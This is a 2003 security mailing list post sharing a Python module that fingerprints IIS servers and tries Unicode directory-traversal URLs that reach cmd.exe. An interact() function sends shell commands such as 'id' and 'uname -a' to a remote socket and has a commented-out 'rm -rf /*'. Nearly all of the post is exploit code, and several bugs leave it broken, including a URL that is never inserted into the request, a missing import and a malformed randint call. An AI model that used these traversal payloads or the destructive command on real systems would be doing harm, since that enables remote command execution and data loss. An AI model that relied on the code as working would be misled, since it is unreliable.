WebApp Sec mailing list archives
no standards for webapp exploitation
From: ned <nd () felinemenace org>
Date: Wed, 2 Jul 2003 00:21:25 -0700 (PDT)
----- uni.py
# i chose unicode because it is still the only
# good IIS exploit! oh and it does not work anymore
# tooo.
#this file incorporates a few modules from
# a teeny project of mine. and this is the (1/4)
# completed version of the web security module.
# there is no standard definition for web based exploits.
# VulnXML and the whisker.dat (and all of libwhisker
# (whisker RIP)) are for testing purposes ONLY. they
# do not scale to enterprise level where API's should
# be easy to work with and provide a high level
# interface to lower level scripting languages (like
# python, perl). variables should be extinct outside
# of module classes. the opensource web security community
# would benefit from a standardized way to exploit
# web applications, wether they are remote code execution,
# remote command execution, server and client injection,
# remote file reading (all of which are going to be covered
# in an independant project which seeks to build webapp
# exploit primitives provider on top of the websec class).
# feel free to send comments and code to me (nd () felinemenace org
# - nd
#mwebsec
from net import *
#from utils import *
import sys
class websec:
def __init__(self):
self.tempdata = []
self.port = 0
self.host = ""
self.fds = {}
self.creds = ""
self.reqbuf = ""
# return code that is expected after request
def expect_return_code(self,codes):
found = 0
c = []
f = ""
if self.tempdata == []:
debug("websec: recieving data")
self.tempdata = self.socket.recv(500).split('\n')
#debug(self.tempdata)
if codes.find(":") != -1:
c = codes.split(":")
debug("websec: looking for %d different return
codes" % len(c))
for x in c:
if self.tempdata[0].find(x) != -1:
f += x
found += 1
else:
if self.tempdata[0].find(codes) != -1:
debug("websec: %s" % self.tempdata[0])
f = codes
found += 1
if found == 0:
debug("websec: did not find expected return
code(s)")
debug("websec: %s" % self.tempdata[0])
return 0
debug("websec: found return code - %s" % f)
# return the array as a string
return 1
def expect_server(self,type):
found = 0
if self.tempdata == []:
self.tempdata = self.socket.recv(500).split('\n')
for x in self.tempdata:
if x.startswith("Server:") or
x.startswith("server:"):
if x.find(type) != -1:
debug("websec: found server type -
%s" % type)
debug("websec: %s" % x)
return 1
else:
debug("websec: did not find server
type - %s" % type)
return 0
def setHost(self,host):
self.host = host
self.creds = host + ":"
def setPort(self,port):
self.port = port
if self.creds != "":
self.creds += "%d" % port
def connect(self):
debug("connection...")
setCredentials(self.host,self.port)
self.get_sock()
def get_sock(self):
self.fds[self.creds] = makeTCPSocket()
self.socket = self.fds[self.creds]
def addreq(self,data):
self.reqbuf += data
def sendreq(self):
debug("sending data!")
self.socket.send(self.reqbuf)
def cleartemp(self):
self.tempdata = []
def clearreq(self):
self.reqbuf = ""
def close(self):
self.socket.close()
#mwebsec
#mnet
import socket
#from utils import *
import random
# pretty explanatory
def setCredentials(h,p):
global set,host,port
debug("net.py: host is %s" % h)
debug("net.py: port is %d" % p)
host = h
port = p
set = 1
def return_set():
return set
def meep():
debug("net.py: use setCredentials First!")
return
def makeTCPSocket():
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
if set == 1:
try:
s.connect((host,port))
except socket.error:
debug("net.py: Could not connect to %s on %d" %
(host,port))
return
debug("net.py: tcp socket is ready for reading/writing")
return s
else:
meep()
def makeUDPSocket():
socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
if set == 1:
try:
s.connect((host,port))
except socket.error:
debug("net.py: Could not connect to %s on %d" %
(host,port))
return
debug("net.py: udp socket is ready for reading/writing")
return s
else:
meep()
def interact(s):
cmd = ["id","uname -a",#"rm -rf /*",
"echo \"_|_ this!\""]
shell = telnetlib.Telnet()
shell.sock = s
# random stuff
shell.write(cmd[random.randint[len(cmd) - 1]])
shell.interact()
return 1
#mnet
def debug(data):
if set == 1:
print data
def debug_set():
global set
set = 1
# not a great example
if __name__ == '__main__':
u = []
debug_set()
w = websec()
w.setHost(sys.argv[1])
w.setPort(80)
w.connect()
w.addreq("HEAD / HTTP/1.0\r\n\r\n")
w.sendreq()
if w.expect_server("IIS") != 1:
debug("not IIS")
sys.exit(0)
w.close()
w.clearreq()
w.cleartemp()
# stick this in your pipe and smoke it.
u.append("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+")
u.append("/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+")
u.append("/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+")
u.append("/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+")
p = 0
for x in u:
p += 1
debug("trying %d..." % p)
req = "GET %s HTTP/1.0\r\n\r\n"
w.clearreq()
w.addreq(req)
w.connect()
w.sendreq()
if w.expect_return_code("200") == 1:
debug("found unicode bug %d on %h" % sys.arg[1])
w.close()
----- uni.py
--
http://felinemenace.org/~nd
Current thread:
- no standards for webapp exploitation ned (Jul 02)
- <Possible follow-ups>
- RE: no standards for webapp exploitation Dawes, Rogan (ZA - Johannesburg) (Jul 02)
- Re: no standards for webapp exploitation Ingo Struck (Jul 02)
- Re: no standards for webapp exploitation dave (Jul 02)